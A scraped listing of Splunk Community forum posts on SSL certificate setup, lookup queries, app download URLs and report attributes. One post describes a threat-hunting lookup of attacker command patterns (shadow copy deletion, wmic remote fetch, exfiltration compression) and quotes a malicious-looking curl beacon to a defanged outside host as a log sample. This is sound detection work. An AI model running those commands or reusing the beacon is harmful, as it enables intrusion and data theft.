All Posts

Find Answers
Ask questions. Get answers. Find technical product solutions from passionate members of the Splunk community.

All Posts

Need a report based on previous day  I have source ip segment xx.xx.xx.xx/28, & destination ip segment xx.xx.xx/24  outcome of query should provide below Date and start + end time of the connecti... See more...
Need a report based on previous day  I have source ip segment xx.xx.xx.xx/28, & destination ip segment xx.xx.xx/24  outcome of query should provide below Date and start + end time of the connection USERNAME APPLICATION:PORT & PROTOCOL APPLICATION SEGMENTS ACCESS POLICY NAME ACTION how can i create customized dashboard, please suggest.
It would help if you could share some anonymised raw events in a code block to prevent formatting corruptions, that way we can see what you are working with and be better able to guide you.
Try a couple of things Add the below to inputs.conf  - restart (YOUR CA CERT) under [SSL] rootCA = /opt/splunk/etc/auth/mycerts/myCertAuthCertificate.pem Run these to validate the certs - see if... See more...
Try a couple of things Add the below to inputs.conf  - restart (YOUR CA CERT) under [SSL] rootCA = /opt/splunk/etc/auth/mycerts/myCertAuthCertificate.pem Run these to validate the certs - see if they read and show information openssl rsa -in /opt/splunk/etc/auth/mycerts/myServerCertificate.pem -text openssl x509 -in /opt/splunk/etc/auth/mycerts/myServerCertificate.pem -text -noout  
All - I am new to Splunk and trying to figure out a way to return a matched command from a CSV table with inputlookup. I have ioc_check table containing command strings and description as below: ... See more...
All - I am new to Splunk and trying to figure out a way to return a matched command from a CSV table with inputlookup. I have ioc_check table containing command strings and description as below: commands description 7z a -t7z -r Compress data for exfiltration vssadmin.* Delete Shadows Deletion of Shadow copy *wmic*process*call*create* Uses WMI to create processes wmic*get*http Using wmic to get and run files from internet   I am using this lookup table commands string against CrowdStrike CommandLine to hunt for any matches commands run by any user in our environment. So when the CommandLine filed from CrowdStrike logs matches any commands string from lookup table, it should generate an alert. What we are trying to achieve is when there is an alert it should also tell us the description of the matching command so we know which command matched with the CrowdStrike CommandLine. The final result should be like this: CommandLine description commands curl -g -k -H user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;) --connect-timeout 5 -d status=2f8bIrZMNKpfunrfOgXZEIywAf18sgF0O6Xgo%3d --retry 0 -L http[:]//wvfg.wetmet[.]net/api/serverservice/heart.php?serverid=1u%2bYbg%2bn25POYs4MAuxnjxQMMDoNMbhWQoixYAF0bjP%2f%2fw%3d Using wmic to get and run files from internet wmic*get*http         I have come up with below search it gives me an alert but not able to display the matching command and description. Any help would be much appreciated! index=crowdstrike event_simpleName=ProcessRollup2 [| inputlookup ioc_check | eval CommandLine="*"+commands+"*" | fields CommandLine] | lookup ioc_check commands OUTPUT description | table _time, CommandLine, description, commands
Hmm. I still get the same error. Certs permissions:   After restart, Splunkd.log:  
Other attributes that *may* distinguish a report include alert.track and alert_condition, but I've found alert_type to be the best. You won't find this information documented.  It's tribal knowledge... See more...
Other attributes that *may* distinguish a report include alert.track and alert_condition, but I've found alert_type to be the best. You won't find this information documented.  It's tribal knowledge and now you're part of the tribe.    Seriously, you can use your browser's console to view the REST commands sent for the UI's Searches, Reports, and Alerts dashboard to see how the two types are differentiated.
Hello, I'm still new to SPLUNK and still learning so apologies for any incorrect naming  I have a search in SPLUNK that runs daily and does some filtering to then lookup an indexed .csv for addi... See more...
Hello, I'm still new to SPLUNK and still learning so apologies for any incorrect naming  I have a search in SPLUNK that runs daily and does some filtering to then lookup an indexed .csv for additional information. The indexed .csv is injected into SPLUNK daily and the files are called: "YYYY-MM-DD Report.csv".  The search is supposed to take that into consideration and look at the latest report based on the date in the subject. It currently looks like this: | rename Letter as C1111 | table A1111, B1111, C1111 | join type=left C1111 [ search earliest=-24h host="AAA" index="BBB" sourcetype="CCC" | eval dateFile=strftime(now(), "%Y-%m-%d") | where like(source,"%".dateFile."%Report.csv") | rename "Number" as C1111 | eval C1111=lower(C1111) | fields C1111, "1 xxxx","2 yyyy","3 zzzz"] | table A1111, B1111, C1111, "1 xxxx","2 yyyy","3 zzzz" This used to work but has stopped a few days back and I'm unable to figure out what the issue might be. 
From the screenshot of files permissions  - the files look like they are for root, set those for the splunk user and try that  
Hi @Zazou , apps.splunk.com should be sufficient to download apps, but anyway, you can do this from your workstation, without openeing any firewall route (that's better!) Ciao. Giuseppe
Hi guys! I'm trying to allow Splunk to access the internet to browse and download apps. So far I have opened up "apps.splunk.com" and "splunkbase.splunk.com", but it doesn't seem to do the trick. An... See more...
Hi guys! I'm trying to allow Splunk to access the internet to browse and download apps. So far I have opened up "apps.splunk.com" and "splunkbase.splunk.com", but it doesn't seem to do the trick. Any other URL's I need to allow?
Tried that already, no dice.
Try this for starters  blacklist1 = EventCode="4663" Message="Account Name:\s+COMPUTER8-55\$"  
Hiu @SplunkerNoob , as I said, see in the Security Essentials App and you'll find hundreds of searches also fro threat  hunting. Ciao. giuseppe
Hello. Im new at Splunk. Recently, I am trying to create and sign my own TLS certificates, following this official guide. https://docs.splunk.com/Documentation/Splunk/9.2.1/Security/Howtoself-signcer... See more...
Hello. Im new at Splunk. Recently, I am trying to create and sign my own TLS certificates, following this official guide. https://docs.splunk.com/Documentation/Splunk/9.2.1/Security/Howtoself-signcertificates However, splunkd.log keep on showing this error: Error setting up SSL for TCP data input from file=inputs.conf stanza="SSL": Can't read key file /opt/splunk/etc/auth/mycerts/myServerCertificate.pem SSL error code=151441516 message="error:0906D06C:PEM routines:PEM_read_bio:no start line"   First, By following the guide, I created: private key of root certificate authority certificate, which is myCertAuthPrivateKey.key CSR for the certificate, which is myCertAuthCertificate.csr root certificate authority certificate, which is myCertAuthCertificate.pem Moreover, I created a server certificate and sign them with the root certificate authority certificate. private key for the server certificate, which is myServerPrivateKey.key CSR for the server certificate, which is myServerCertificate.csr Server certificate, which is myServerCertificate.pem   Basically, following the guide, i have 6 files in mycerts folder, and one srl file. This Splunk Master is a master node connects to 3 indexers (clustering). I followed this guide to modify the configuration files, which is the inputs.conf and server.conf i believe. Ref: https://docs.splunk.com/Documentation/Splunk/9.2.1/Security/ConfigureSplunkforwardingtousesignedcertificates 6+1 files for certificate. /opt/splunk/etc/system/local/server.conf [general] ... [sslConfig] sslRootCAPath = /opt/splunk/etc/auth/mycerts/myCertAuthCertificate.pem sslPassword = mypassword ... /opt/splunk/etc/system/local/inputs.conf [splunktcp-ssl:9997] disabled=0 [SSL] serverCert = /opt/splunk/etc/auth/mycerts/myServerCertificate.pem sslPassword = mypassword requireClientCert = true sslVersions = *,-ssl2 Everytime i do service splunk restart, i still get the SSL error. Anyone know why and whats happening?? Same error is also happening in any other indexes. (same steps as i mentioned above)
What other indicators would there be that distinguish it to reports only?   And also how do you know that "alert_type=always" is an attribute that singles out reports, can't find this info anywhere... See more...
What other indicators would there be that distinguish it to reports only?   And also how do you know that "alert_type=always" is an attribute that singles out reports, can't find this info anywhere
My question is what else should I put on there.
Hi @SplunkNinja , good for you, see next time! let us know if we can help you more, or, please, accept one answer for the other people of Community. Ciao and happy splunking Giuseppe P.S.: Karma... See more...
Hi @SplunkNinja , good for you, see next time! let us know if we can help you more, or, please, accept one answer for the other people of Community. Ciao and happy splunking Giuseppe P.S.: Karma Points are appreciated by all the contributors
Time Event 4/27/245:30:37.182 AM { "Client":"ClientA", "Msgtype":"WebService", "Priority":2, "Interactionid":"1DD6AA27-6517-4D62-84C1-C58CA124516C", "Seq":15831, "Threadid":23, "messag... See more...
Time Event 4/27/245:30:37.182 AM { "Client":"ClientA", "Msgtype":"WebService", "Priority":2, "Interactionid":"1DD6AA27-6517-4D62-84C1-C58CA124516C", "Seq":15831, "Threadid":23, "message":"TimeMarker: MyClient: Result=Success Time=0000.05s Message=No payments found. (RetrievePaymentsXY - ID1:123131 ID2:Site|12313 ID3:05/14/2024-07/12/2024 1|12313", "Userid":"Unknown" }   I just want to make sure that I state it right, when I run the following query, I get an output already, so json and fields are all correct. It is just my json was messed up when I massaged it (please ignore) : index=application_na sourcetype=my_logs:hec source=my_Logger_PROD retrievePayments* returncode=Error | rex field=message "Message=.* \((?<apiName>\w+?) -" | lookup My_Client_Mapping Client OUTPUT ClientID ClientName Region | chart count over ClientName by apiName where `chart count over` is at the end. But, when I move the `lookup` statement after `chart`, I don't get any data back. If I remove the `lookup` the query won't work as `ClientName` is stored in lookup mapping file.
Thanks for your reply. At the end, the solution was about to just disable the splunk light forwarder via CLI. ./splunk disable app SplunkLightForwarder after this change I restarted splunk servic... See more...
Thanks for your reply. At the end, the solution was about to just disable the splunk light forwarder via CLI. ./splunk disable app SplunkLightForwarder after this change I restarted splunk service and it worked fine back again.   
I narrowed the issue down to an add-on and then updated to the latest version.  This fixed the problem.  Thanks for you help @gcusello and @PickleRick